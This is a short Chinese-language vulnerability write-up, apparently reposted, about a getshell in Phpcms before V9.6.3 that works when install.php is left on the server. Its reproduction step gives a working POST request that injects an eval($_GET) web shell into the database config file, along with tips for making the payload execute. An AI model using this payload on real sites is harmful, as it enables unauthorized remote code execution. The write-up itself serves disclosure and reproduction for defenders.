Phpcms_V9.6.3_install.php_没有即使删除导致的getshell-棉花糖会员站

# Phpcms V9.6.3 install.php 没有即使删除导致的getshell

============

一、漏洞简介
————

比较鸡肋，需要在环境安装好了之后，install.php也没有被删除，才可以利用

二、漏洞影响
————

Phpcms \< V9.6.3 三、复现过程 ------------ POST /install/install.php?step=installmodule module=admin&dbport=3306&pconnect=eval($_GET["a"]) > 这里控制的是
> pconnect参数，因为默认它没有单引号比较好调试。注意这里如果不传dbport参数的话database.php里的port参数会置空，将会报错。就无法执行到后面的
> eval了

![1.png](/static/qingy/Phpcms_V9.6.3_install.php_没有即使删除导致的getshell/img/rId24.png)

被修改后的database.php：

![2.png](/static/qingy/Phpcms_V9.6.3_install.php_没有即使删除导致的getshell/img/rId25.png)

url：`/caches/configs/database.php`

![3.png](/static/qingy/Phpcms_V9.6.3_install.php_没有即使删除导致的getshell/img/rId26.png)

文章版权归作者所有，未经允许请勿转载。

THE END